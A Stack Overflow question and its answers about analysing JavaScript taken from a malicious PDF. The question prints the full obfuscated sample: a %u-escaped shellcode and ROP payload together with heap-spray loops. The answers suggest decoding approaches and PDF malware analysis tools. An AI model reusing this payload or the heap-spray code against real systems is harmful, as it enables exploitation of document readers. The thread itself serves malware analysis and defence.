I have a PDF file that I know for a fact contains JavaScript that does something malicious, though I'm not sure what at this point.
I have successfully uncompressed the PDF file and extracted the plaintext JavaScript source code, but the code itself is kind of hidden in a syntax I haven't seen before.
Code example (this is what the majority of the code looks like):
var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')
I imagine that this notation, with long variable/function names and hidden text characters, is meant to confuse scanners that look for this type of thing.
Two questions:
Question 1
Can someone tell me what this %u4141 notation is called?
Question 2
Is there some tool that will translate that notation into plaintext so I can see what it is doing?
Full JS code:
var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');
var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");
while (C.length + 20 + 8 < 65536) C+=C;
D = C.substring(0, (0x0c0c-0x24)/2);
D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";
Those could be memory addresses, OS calls, heap spraying, anything.
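One way to probe the heap-spraying guess without running anything is to redo the length arithmetic of the posted loops. The sketch below is only an illustration: `sprayLayout` and `bLength` are hypothetical names, and `bLength` (the number of `%uXXXX` units in `B`) is a value you would have to count from the sample yourself. It works on lengths only and never builds the payload strings.

```javascript
// Recompute the string lengths from the posted code using numbers only.
// bLength: number of %uXXXX units in B (hypothetical input, count it yourself).
function sprayLayout(bLength) {
  let c = 2; // C starts as two UTF-16 units: %u0c0c%u0c0c
  while (c + 20 + 8 < 65536) c += c; // mirrors: while (C.length + 20 + 8 < 65536) C += C

  const prefix = (0x0c0c - 0x24) / 2; // units of C placed in front of B
  const d = prefix + bLength + c; // D = C-prefix + B + C

  let e = Math.min(d, 65536 / 2); // E = D.substring(0, 65536/2)
  while (e < 0x80000) e += e; // mirrors: while (E.length < 0x80000) E += E

  const f = Math.min(e, 0x80000 - (0x1020 - 0x08) / 2); // F = E.substring(...)
  const blocks = 0x1f0; // number of array entries in G
  const bytesPerBlock = (f + 1) * 2; // F + "s", two bytes per UTF-16 unit

  return { c, prefix, f, blocks, bytesPerBlock, totalBytes: blocks * bytesPerBlock };
}

// 300 is a placeholder for the real length of B.
console.log(sprayLayout(300));
```

Under these assumptions each of the 496 array entries is roughly 1 MB and the array as a whole is roughly 518 MB of near-identical data, filled with the repeated value 0x0c0c. That pattern is consistent with a heap spray, but it does not prove one.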
The clue is that the function being called is unescape. To get the actual values, you want to unescape that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.
The result will likely be garbage in ASCII, but you can try plugging it into a hex editor to see if you can make any more sense out of it. If a virus scanner can identify the infection source of that file, maybe you can do more research on that particular malware and figure out what that code is doing.
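If you would rather not paste the string into an online tool, the conversion can also be sketched offline, for example in Node.js. The helper names `percentUToBytes` and `toHex` are made up for this illustration. The byte order is an assumption: each `%uXXXX` is one 16-bit unit, and the sketch emits the low byte first, as it would sit in memory on a little-endian x86 machine. It parses the text with a regular expression and never evaluates it.

```javascript
// Turn a %uXXXX-escaped string into raw bytes without calling unescape().
// Assumption: little-endian layout, so the low byte of each unit comes first.
function percentUToBytes(escaped) {
  const bytes = [];
  const pattern = /%u([0-9a-fA-F]{4})/g;
  let match;
  while ((match = pattern.exec(escaped)) !== null) {
    const unit = parseInt(match[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return bytes;
}

// Format bytes as space-separated two-digit hex, ready for a hex editor.
function toHex(bytes) {
  return bytes.map((b) => b.toString(16).padStart(2, "0")).join(" ");
}

// First four units of the string from the question.
const sample = "%u4141%u4141%u63a5%u4a80";
console.log(toHex(percentUToBytes(sample))); // 41 41 41 41 a5 63 80 4a
```

Read as a little-endian 32-bit value, the last four bytes form 0x4a8063a5, which looks more like an address than like text. To write the bytes to a file for a hex editor, `Buffer.from(bytes)` with `fs.writeFileSync` would do.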
In the interest of science, fire up a Windows VM, run it, and see what it does :)
It looks like you have already extracted the JavaScript from the PDF. Your problem seems to be with analyzing this JavaScript.
Since this topic (obfuscating and hiding malicious JavaScript code in harmless-looking PDF files) seems to be becoming more and more popular with malware authors, let me list some tools and websites which have proved helpful to beginners in dissecting this type of threat:
- Didier Stevens' PDF-Tools
- Part 1 (of many) of Didier Stevens' PDF Malware Screencasts (on YouTube)
- Jay Berkenbilt's QPDF: utility for content-preserving PDF transformations. A useful command to unpack all/most compressed objects inside a PDF:
qpdf --qdf original.pdf unpacked.pdf
Then open unpacked.pdf in a text editor.
- Julia Wolf's presentation about PDF malware obfuscation
- peepdf: A Python tool to explore PDFs (find out if they are malicious)
- PDFTricks: a (non-exhaustive) list of PDF source code obfuscation methods
- Wepawet: online resource to analyse PDF/JavaScript/Flash files (generates a report)
- Origami-PDF: Ruby tool to analyze and generate malicious PDFs
- (... many more resources not listed here...)
I don't know exactly how you extracted the JavaScript snippet you provided in your question. But, by all means, don't rely on having found all of the JS code inside the PDF, unless you are a PDF expert who knows where to look and how to uncover all possible obfuscations. (I recommend you apply tool No. 3 to your source PDF and look at the resulting PDF in the light of the tips in No. 6. The other tools may need some more studying of PDF syntax before you can really make them useful to you.)
Update
Here is an update to my almost 3-year-old answer. It's worthwhile to add:
pdfinfo -js: the most recent (Poppler-based, not XPDF-based!) versions of pdfinfo (starting with v0.25.0, released Dec 11, 2013) now know the -js command line parameter, which prints out the JavaScript code embedded in a PDF file.
This works even for many cases where the /JavaScript name within the PDF source code is obfuscated by using (formally legal) PDF name constructs such as /#4Aavascript or /J#61v#61script or similar.
Unfortunately, this marvelous feature addition to pdfinfo is still far too little known. Please share!
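To see why such names are formally legal: in PDF name syntax, a # followed by two hex digits stands for the byte with that value, so #61 is the letter a. A minimal sketch of undoing that escaping is shown below. `decodePdfName` is a hypothetical helper written for this illustration; it is not part of pdfinfo or any other tool mentioned here, and it only handles single-byte escapes.

```javascript
// Replace every #xx hex escape in a PDF name with the character it encodes.
// Hypothetical helper for illustration only.
function decodePdfName(name) {
  return name.replace(/#([0-9a-fA-F]{2})/g, (whole, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

console.log(decodePdfName("/J#61v#61script")); // /Javascript
```

When searching an unpacked PDF by hand, normalizing names this way before looking for JavaScript-related keys helps avoid missing the escaped variants.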
Update 2
Another update, because the above-mentioned peepdf tool recently got the extract sub-command added:
peepdf.py: This is a Python-based command line tool which can analyse PDF files. It was developed by Jose Miguel Esparza mainly in order to "find out if the file can be harmful or not", but is also very good for general exploration of PDF file structures.
Installation and usage:
- Clone the GitHub repository:
git clone https://github.com/jesparza/peepdf git.peepdf
- Create a symlink to the peepdf.py script and put it somewhere into your $PATH:
cd git.peepdf ;
ln -s $(pwd)/peepdf.py ${HOME}/bin/peepdf.py
- Run it in interactive mode, opening a PDF file:
peepdf.py -fil my.pdf
Use the extract js > all-js-in-my.pdf command to extract and redirect all JavaScript contained in my.pdf into a file.
Source: https://stackoverflow.com/questions/10220497/extract-javascript-from-malicious-pdf